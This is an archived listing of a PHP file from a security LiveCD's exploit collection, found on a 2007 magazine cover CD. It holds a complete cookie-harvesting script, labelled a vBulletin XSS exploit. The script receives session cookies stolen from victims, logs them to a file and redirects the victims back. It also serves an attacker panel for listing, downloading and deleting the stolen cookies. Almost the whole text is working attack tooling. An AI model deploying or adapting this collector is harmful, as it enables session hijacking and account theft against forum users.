home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / webapp / vbulletin / vbulletin-xss.php

< prev

next >

Wrap

PHP Script  |  2005-02-12  |  4KB  |  100 lines

---

1. <?PHP
2.       // vBulletin XSS Injection Vulnerability: Exploit
3.       // ---
4.       // Coded By : Sp.IC (SpeedICNet@Hotmail.Com).
5.       // Descrption: Fetching vBulletin's cookies and storing it into a
6. log file.
7.  
8.       // Variables:
9.  
10.       $LogFile = "Cookies.Log";
11.  
12.       // Functions:
13.       /*
14.       If ($HTTP_GET_VARS['Action'] = "Log") {
15.           $Header = "<!--";
16.           $Footer = "--->";
17.       }
18.       Else {
19.  
20.            $Header = "";
21.            $Footer = "";
22.       }
23.       Print ($Header);
24.       */
25.       Print ("<Title>vBulletin XSS Injection Vulnerability:
26. Exploit</Title>");
27.       Print ("<Pre>");
28.       Print ("<Center>");
29.       Print ("<B>vBulletin XSS Injection Vulnerability: Exploit</B>\n");
30.       Print ("Coded By: <B><A
31. Href=\"MailTo:SpeedICNet@Hotmail.Com\">Sp.IC</A></B><Hr Width=\"20%\">");
32.       /*
33.       Print ($Footer);
34.       */
35.  
36.       Switch ($HTTP_GET_VARS['Action']) {
37.           Case "Log":
38.  
39.                  $Data = $HTTP_GET_VARS['Cookie'];
40.                  $Data = StrStr ($Data, SubStr ($Data, BCAdd (0x0D, StrLen
41. (DecHex (MD5 (NULL))))));
42.                  $Log = FOpen ($LogFile, "a+");
43.                          FWrite ($Log, Trim ($Data) . "\n");
44.                          FClose ($Log);
45.                          Print ("<Meta HTTP-Equiv=\"Refresh\" Content=\"0;
46. URL=" . $HTTP_SERVER_VARS['HTTP_REFERER'] . "\">");
47.           Break;
48.                 Case "List":
49.                  If (!File_Exists ($LogFile) || !In_Array ($Records)) {
50.                      Print ("<Br><Br><B>There are No
51. Records</B></Center></Pre>");
52.                      Exit ();
53.                  }
54.                  Else {
55.                      Print ("</Center></Pre>");
56.                      $Records = Array_UniQue (File ($LogFile));
57.                                   Print ("<Pre>");
58.                                   Print ("<B>.:: Statics</B>\n");
59.                      Print ("\n");
60.                                   Print ("o Logged Records : <B>" . Count
61. (File ($LogFile)) . "</B>\n");
62.                      Print ("o Listed Records : <B>" . Count
63. ($Records) . " </B>[Not Counting Duplicates]\n");
64.                      Print ("\n");
65.  
66.                      Print ("<B>.:: Options</B>\n");
67.                      Print ("\n");
68.  
69.                      If (Count (File ($LogFile)) > 0) {
70.                          $Link['Download'] = "[<A Href=\"" .
71. $LogFile . "\">Download</A>]";
72.                      }
73.                      Else{
74.                          $Link['Download'] = "[No Records in Log]";
75.                      }
76.  
77.                      Print ("o Download Log : " . $Link
78. ['Download'] . "\n");
79.                      Print ("o Clear Records : [<A Href=\"" .
80. $SCRIPT_PATH. "?Action=Delete\">Y</A>]\n");
81.                      Print ("\n");
82.                      Print ("<B>.:: Records</B>\n");
83.                      Print ("\n");
84.  
85.                      While (List ($Line[0], $Line[1]) = Each ($Records)) {
86.                          Print ("<B>" . $Line[0] . ": </B>" . $Line[1]);
87.                      }
88.                  }
89.  
90.                  Print ("</Pre>");
91.           Break;
92.           Case "Delete":
93.               @UnLink ($LogFile);
94.               Print ("<Br><Br><B>Deleted Succsesfuly</B></Center></Pre>")
95. Or Die ("<Br><Br><B>Error: Cannot Delete Log</B></Center></Pre>");
96.               Print ("<Meta HTTP-Equiv=\"Refresh\" Content=\"3; URL=" .
97. $HTTP_SERVER_VARS['HTTP_REFERER'] . "\">");
98.           Break;
99.       }
100.     ?>